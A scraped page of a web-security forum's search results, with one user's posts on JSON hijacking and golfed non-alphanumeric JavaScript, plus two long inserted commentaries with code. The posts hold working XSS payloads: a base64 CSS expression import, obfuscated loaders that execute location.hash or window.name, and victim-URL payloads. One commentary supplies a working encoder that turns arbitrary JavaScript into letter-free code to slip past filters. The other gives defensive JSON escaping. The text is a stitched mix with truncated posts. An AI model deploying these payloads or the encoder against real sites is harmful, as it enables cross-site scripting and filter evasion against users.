Sla.ckers.org
Script obfuscation, filter evasion, IDS/IPS/WAF bypassing... this is where it should live. Because this topic is too big to live anywhere else. Phj33r! 

Results 1 - 29 of 29
3 years ago
theharmonyguy
@thornmaker: Sorry, yes, I was focused more on the fact that the <script> tag isn't rendered as HTML... but you're right, if the three slashes weren't added, that would close off the script and you could insert HTML. However, aren't those slashes enough? Since the forward slash is escaped, it still doesn't seem like an XSS issue...
Forum: XSS Info
3 years ago
theharmonyguy
It's been a while since I looked at this sort of JSON hijacking, but I know you can't override the Object constructor like you can the Array constructor, so that method of attack would not work. I recall there still being some possible issues with this format, though, which is why (for instance) Facebook includes a bit of dummy code at the start of any JSON responses.
Forum: XSS Info
3 years ago
theharmonyguy
Keep in mind that the part of the source code you're looking at is already inside of a bunch of JavaScript - in fact, it's part of a string inside of a JSON assignment. The slashes before the quote marks prevent them from terminating the string and allowing injection of new scripts. Consequently, this wouldn't qualify as an XSS hole, even though the appearances of <> unencoded may make it lo
Forum: XSS Info
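The three JSON-in-script posts above turn on two separate questions: whether a JSON body can be pulled in with a `<script src>` at all (the hijacking case, where a bare object literal is a syntax error but an array is not, and a `for(;;);` prefix of the kind Facebook uses stops the array case), and whether a JSON string embedded in an inline script can break out of its string or its `<script>` element (the escaped quotes and slashes). The following is an added example, not code from the posts or from sla.ckers.org; it runs in Node with constructed inputs, and the function names are my own.

```javascript
// Added example (not from the thread). Two checks for JSON that is exposed to
// script contexts. Runs in Node; no DOM or network needed.

// 1. Would this response body parse if an attacker loaded it via <script src>?
//    A top-level object literal is a syntax error as a statement; an array is not.
//    Only the parse is attempted: the body is never executed.
function parsesAsScript(text) {
  try {
    new Function(text);
    return true;
  } catch (e) {
    if (e instanceof SyntaxError) return false;
    throw e;
  }
}

// 2. Facebook-style guard: a prefix that compiles, but hangs the page if the
//    body is ever run as a script. The legitimate XHR consumer strips it
//    before JSON.parse; a naive JSON.parse on the raw body fails.
const GUARD = 'for(;;);';

function guardJson(value) {
  return GUARD + JSON.stringify(value);
}

function parseGuardedJson(body) {
  if (!body.startsWith(GUARD)) throw new Error('missing anti-hijacking prefix');
  return JSON.parse(body.slice(GUARD.length));
}

// 3. JSON embedded in an inline <script>: JSON's own escaping keeps a quote in
//    the data from closing the JS string (the \" the posts mention), but the
//    HTML parser still ends the <script> element at a literal "</script" inside
//    that string. Escaping '<' and '>' as \u003c / \u003e (the same idea as the
//    <\/ the posts describe) keeps the output valid JSON and inert as HTML.
//    U+2028/2029 are escaped too, since older JS parsers treat them as newlines.
function jsonForInlineScript(value) {
  return JSON.stringify(value)
    .replace(/</g, '\\u003c')
    .replace(/>/g, '\\u003e')
    .replace(/\u2028/g, '\\u2028')
    .replace(/\u2029/g, '\\u2029');
}

// Constructed sample: a user-controlled string that tries to close the script.
const sample = { name: '</script><img src=x onerror=alert(1)>' };
const safe = jsonForInlineScript(sample);   // contains no '<' or '>' at all
```

`parsesAsScript` only compiles the text, so it is safe to run against real response bodies when auditing which endpoints are reachable via a script include; the guard is still only a defence for the array case, since an object literal never parsed as a script in the first place.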
3 years ago
theharmonyguy
Yay! :) As for no spaces... <style /><a href="}@import/**/data:text/css%3Bbase64,Knt4OmV4cHJlc3Npb24oYWxlcnQoMSkpfQ%3D%3D;">click</a>
Forum: Obfuscation
3 years ago
theharmonyguy
How about this? <style /><a href="}@import data:text/css%3Bbase64,Knt4OmV4cHJlc3Npb24oYWxlcnQoMSkpfQ%3D%3D;">click</a>
Forum: Obfuscation
3 years ago
theharmonyguy
Pretty slick! One quick trick I see that will shave off 4 characters is to replace T=Z with T=C+A+Z and then replace the two C+A+T's with just T.
Forum: Obfuscation
4 years ago
theharmonyguy
Hey all, I've often visited the XSS Cheat Sheet, RSnake's blog, and these forums (particularly about non-alnum JS, which I discovered during last year's OWASP Sweden contest), but I'd never actually joined until last week. Figured I should make a formal introduction. I'm Joey Tyson, a.k.a theharmonyguy, and got started with security through a hobby of finding holes in Facebook apps. During grad
Forum: Intro
4 years ago
theharmonyguy
OK, I was bored tonight, so I now present a truly cross-browser, non-alphanumeric arbitrary script loader:
// 240
location.hash='javascript:alert(1)';
ð=[_='',Ú=!_+_,$=!!_+_,æ=!_/!!_+_,þ={}+_,µ=Ú[º=+_],Æ=Ú[++_],È=_+_,ø=þ[_],Ñ=æ[_],Á=$[_++],É=Ú[++_],Ó=$[_],Ç=þ[_+È]][Ç+ø+Ñ+Ç+Á+µ],(Å=ð()[º]) [ª=$[È]+ø+Ç+Á+µ+æ[_]+ø+Ñ]=/[^#]+$/[É+(ú=/_/[Ç+ø+Ñ+Ó+µ+Æ
Forum: Obfuscation
4 years ago
theharmonyguy
Well, I created an initial, non-optimized possible starting point:
// 157
location.hash='javascript:alert(1)';
ð=[_='',Ú=!_+_,$=!!_+_,æ=!_/!!_+_,þ={}+_,µ=Ú[+_],ø=þ[++_],Ñ=æ[_],Á=$[_++],Ç=þ[++_+(--_)]][Ç+ø+Ñ+Ç+Á+µ],(Å=ð()[+[]])[ª=$[_]+ø+Ç+Á+µ+æ[++_]+ø+Ñ]=/[^#]+$/(Å[ª])
However, this one is only Firefox and Chrome (probably Safari) so far, since apparently IE do
Forum: Obfuscation
4 years ago
theharmonyguy
LeverOne Wrote:
> it will be in the "old style"

Heh, I didn't realize that ="ab" was also Firefox-only... now I know!
Forum: Obfuscation
4 years ago
theharmonyguy
After learning more about regex and seeing .mario's use of it, I got down to 106:
location.hash='javascript:alert(1)';
(æ=([µ,ð,,,,Ñ,,Å]=[ƒ=!'']+ƒ/!ƒ,[[,Á,ª,$,,,ø,,,,Ç]=!ƒ+{}][$+ø+ð+µ])())[_=ª+ø+Ç+Á+µ+Å+ø+Ñ]=/#(.*)/(æ[_])[+ƒ]
At first this was 107, and after reading LeverOne's mention of Gareth's trick, I could only get to 104... and then I realized I had once again lef
Forum: Obfuscation
4 years ago
theharmonyguy
I was playing around with some of the tricks on this list and came across two issues... First, some of the ones under "all browsers" use __proto__ and __parent__. But wouldn't those exclude IE (and Opera)? Also, __proto__.__parent__ is undefined in Chrome. Second, we should perhaps distinguish between getting a window object and getting the window object of the current document. Fo
Forum: Obfuscation
4 years ago
theharmonyguy
*facepalm* I get it now, thanks. I haven't done much regex, so I started with what I knew... now I know what to study next.
Forum: Obfuscation
4 years ago
theharmonyguy
OK LeverOne, I think I've gotten 117:
http:// victim.com/#*/alert(1)//javascript:/*xx
_=([µ,ð,,É,,Ñ,,Å]=[ƒ=!'']+ƒ/!ƒ,[[,Á,ª,$,,,ø,,,,Ç]=!ƒ+{}][$+ø+ð+µ])()[ª+ø+Ç+Á+µ+Å+ø+Ñ],_=(_+Á)[$+ª+Å+Ç+É](++ƒ*-ƒ<<ƒ)+_
btw, when I try this style in Firefox, the redirect happens but the new script doesn't actually execute; not sure if it's just a setting of mine or wh
Forum: Obfuscation
4 years ago
theharmonyguy
Not the first time I've forgotten about a leftover letter. :) You know, we could change it to be cross-browser - that would not only remove btoa but (x=[]['sort'])() as well. Though these exercises may be more fun for a newbie like me. :)
Forum: Obfuscation
4 years ago
theharmonyguy
Well if we drop the newer rules, I'm already ahead of you... :)
// 109
name='javascript:alert(1)';
(w=(=+x/!x,[[,a,l,s,,,o,b,,,c]=!x+{}])())=w('&#157;©&#158;')]
But LeverOne already got down to 89 using btoa anyway...
Forum: Obfuscation
4 years ago
theharmonyguy
LeverOne Wrote:
> First, think about that number (ƒ*ƒ*ƒ), and you
> get 120 - is the limit.

That number is 2*2*2=8... not following you. Totally forgot about bitwise operators. Very slick.

LeverOne Wrote:
> Secondly, "eval" - this is the wrong directio
Forum: Obfuscation
4 years ago
theharmonyguy
Well, I'm stuck at 121:
(æ=[[µ,ð,,É,,Ñ,,Å]=[ƒ=!'']+ƒ/!ƒ,[,Á,ª,$,,,ø,,,,Ç]=!ƒ+{}][$+ø+ð+µ])()[É+(µ+æ)[++ƒ+[ƒ*ƒ*ƒ]]+Á+ª]('/*'+æ()[ª+ø+Ç+Á+µ+Å+ø+Ñ])
(æ=[[µ,ð,,É,,Ñ,,Å]=[ƒ=!'']+ƒ/[],[,Á,ª,$,,,ø,,,,Ç]=!ƒ+{}][$+ø+ð+µ])()[É+(µ+æ)[++ƒ+[ƒ*ƒ*ƒ]]+Á+ª]('/*'+æ()[ª+ø+Ç+Á+µ+Å+ø+Ñ])
(æ=[[µ,ð,,É,,Ñ,,Å]=[ƒ=!'']+ƒ/![[,Á,ª,$,,,ø,
Forum: Obfuscation
4 years ago
theharmonyguy
New approach got me down to 130 126 123:
http:// victim/#*/alert(1)
(æ=[ƒ=!'',[µ,ð,,É,,Ñ,,,,Å]=[ƒ]+ƒ[[,Á,ª,$,,,ø,,,,Ç]=!ƒ+{}]][$+ø+ð+µ])()[É+(µ+æ)[++ƒ+[ƒ*ƒ*ƒ]]+Á+ª]('/*'+æ()[ª+ø+Ç+Á+µ+Å+ø+Ñ])
Forum: Obfuscation
4 years ago
theharmonyguy
OK, I'm open to hints - I must be missing some trick because I just can't seem to get under 144:
(æ=[ƒ='',[µ,ð,Ú,É,,Ñ]=[!ƒ++]+ƒ[[,Á,ª,$,,,ø,,,,Ç]=!ƒ+{}],_=Ñ+Á+(þ=ƒ[Ç+ø+Ñ+$+µ+ð+Ú+Ç+µ+ø+ð]+Á)[ƒ+[ƒ]]+É][$+ø+ð+µ])()[É+þ[++ƒ+[++ƒ*ƒ]]+Á+ª](æ()[_])
I've tried to get rid of the opening ƒ='', find a shorter way to get "c" or "v", but it
Forum: Obfuscation
4 years ago
theharmonyguy
@LeverOne: I'm down to 148 144 so far. No hints yet. :)
Forum: Obfuscation
4 years ago
theharmonyguy
// 154
name='alert(1)';
(ð=[ƒ='',[µ,æ,Ú,É,,Á,þ,$,,,ø,,,,Ç]=!ƒ+[!++ƒ]+{},[,Ñ]=ƒ/!ƒ+µ,ª=(ƒ[Ç+ø+Ñ+$+µ+æ+Ú+Ç+µ+ø+æ]+µ)[ƒ+[ƒ]]][$+ø+æ+µ])()[É+(ð+µ)[++ƒ+[++ƒ+ƒ+ƒ/ƒ]]+Á+þ](ð()[Ñ+Á+ª+É])
Forum: Obfuscation
4 years ago
theharmonyguy
// 155
name='alert(1)';
(ð=[ƒ=+!'',[µ,æ,Ú,É,,Á,þ,$,,,ø,,,,Ç]=!!ƒ+[!ƒ]+{},[,Ñ]=ƒ/!ƒ+µ,ª=(ƒ[Ç+ø+Ñ+$+µ+æ+Ú+Ç+µ+ø+æ]+µ)[ƒ+[ƒ]]][$+ø+æ+µ])()[É+(ð+µ)[++ƒ+[++ƒ+ƒ+ƒ/ƒ]]+Á+þ](ð()[Ñ+Á+ª+É])
Forum: Obfuscation
4 years ago
theharmonyguy
// 157, follows LeverOne's four rules
name='alert(1)';
(ð=[ƒ=+!'',[µ,æ,Ú,É,,Á,þ,$,,,ø,,,,Ç]=!!ƒ+[!ƒ]+{},Ñ=(ƒ/!ƒ+µ)[ƒ],ª=(ƒ[Ç+ø+Ñ+$+µ+æ+Ú+Ç+µ+ø+æ]+µ)[ƒ+[ƒ]]][$+ø+æ+µ])()[É+(ð+µ)[++ƒ+[++ƒ+ƒ+ƒ/ƒ]]+Á+þ](ð()[Ñ+Á+ª+É])
I tried employing some of the tricks that LeverOne and .mario have been using to shorten up the beginning, but without using b
Forum: Obfuscation
4 years ago
theharmonyguy
Oops, just noticed I had left some numbers in the code I originally posted - my bad. I've gotten down to 160 using a slightly different approach so far. I'm totally game for more difficult/interesting challenges, you guys have just been way ahead of me on this stuff. :)
Forum: Obfuscation
4 years ago
theharmonyguy
LeverOne Wrote:
> Yes, as well as characters 0-31. I do not quite
> understand what the problem is? These symbols
> (127—159) can be filtered? Anything can be
> filtered.

I wasn't thinking so much of filtering as inserting - i.e., how are you going to make a request that includes those characters and get Firefox to reliab
Forum: Obfuscation
4 years ago
theharmonyguy
@LeverOne: Good thought to use btoa for 'v' and 'name', but for the latter case I'm wondering how practical it would be to include &#157; and &#158; since they're control codes...
Forum: Obfuscation
4 years ago
theharmonyguy
Well, those were supposed to be Unicode characters resembling the letters they represent... sorry for the encodings.
Forum: Obfuscation
4 years ago
theharmonyguy
You guys may have already tackled this, but I didn't recall seeing it yet... There was a topic on here for the shortest non-alphanumeric JS to execute alert(1), changed to alert('owasp') for the AppSec challenge. Then much time has been invested trying to find the smallest set of nonalnum characters needed to execute arbitrary JS. So I figured, why not for the fun of it combine the two - fin
Forum: Obfuscation
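The non-alphanumeric loaders in the Obfuscation posts above (and the challenge described in the last one) all rest on the same handful of primitives: coercing booleans, objects and divisions to strings (`!''+''` is "true", `{}+''` is "[object Object]", `!''/!!''+''` is "Infinity"), indexing those strings with numbers built from `+[]` and `!![]`, and reaching the Function constructor through `[]['sort']['constructor']`, as one of the posts notes. The posts then shorten everything with Unicode-letter variables and move the payload into `location.hash` or `name`. The encoder below is an added example, not code from the thread or from any of its participants; it uses no identifiers at all, runs in Node, and supports only the letters those six source strings can supply (it throws for anything else, which is exactly the limitation the posts work around with the hash and name tricks). Function names, the atom table and the sample payload are my own.

```javascript
// Added example (not from the thread): a small encoder that turns a JavaScript
// function body into an expression with no ASCII letters or digits, built from
// the primitives discussed in the posts. Runs in Node; no DOM needed.

// Non-alphanumeric expressions whose string values supply letters.
// Each is parenthesised so it can be indexed or concatenated safely.
const ATOMS = {
  'false':           '(![]+[])',        // ![]    -> false  -> "false"
  'true':            '(!![]+[])',       // !![]   -> true   -> "true"
  'undefined':       '([][[]]+[])',     // [][""] -> undefined
  '[object Object]': '([]+{})',         // array + object  -> "[object Object]"
  'Infinity':        '(+!![]/+[]+[])',  // 1/0    -> Infinity
  'NaN':             '(+{}+[])',        // +{}    -> NaN
};

// A non-negative integer without digits: 0 is +[], n>0 is +!![] plus n-1 more !![].
function num(n) {
  return n === 0 ? '+[]' : '+!![]' + '+!![]'.repeat(n - 1);
}

// Letter table: for each character, the first atom/index that yields it,
// e.g. 's' -> (![]+[])[+!![]+!![]+!![]] ("false"[3]).
const LETTER = {};
for (const [text, expr] of Object.entries(ATOMS)) {
  [...text].forEach((ch, i) => {
    if (!(ch in LETTER)) LETTER[ch] = `${expr}[${num(i)}]`;
  });
}

// Encode one character; every result is a parenthesised, string-valued expression
// so that joining with '+' never produces a '++' token or a numeric addition.
function encodeChar(ch) {
  if (ch in LETTER) return `(${LETTER[ch]})`;
  if (/[0-9]/.test(ch)) return `(${num(Number(ch))}+[])`;   // number -> string
  if (/[A-Za-z\\\n\r]/.test(ch)) {
    throw new Error(`no non-alphanumeric source for ${JSON.stringify(ch)}; ` +
      'the thread sidesteps this by carrying the payload in location.hash or name');
  }
  if (ch === "'") return `("'")`;
  return `('${ch}')`;   // remaining punctuation can simply be quoted
}

function encodeString(s) {
  return [...s].map(encodeChar).join('+');
}

// Whole payload: []["sort"]["constructor"](body)() is Function(body)().
function encodeNonAlnum(body) {
  return `[][${encodeString('sort')}][${encodeString('constructor')}](${encodeString(body)})()`;
}

function hasAlnum(s) {
  return /[A-Za-z0-9]/.test(s);
}

// Demo on a constructed body: the result contains no letters or digits,
// yet evaluating it runs the body and yields 42.
const demo = encodeNonAlnum('return 6*7');
```

The output is far longer than the thread's hand-tuned versions because every letter is spelled out from scratch; the posts get under 110 characters by caching the source strings in one-character Unicode variables and by letting the browser supply the payload text. Running `hasAlnum` over any candidate is the quickest check that a filter keyed on `[A-Za-z0-9]` would pass it.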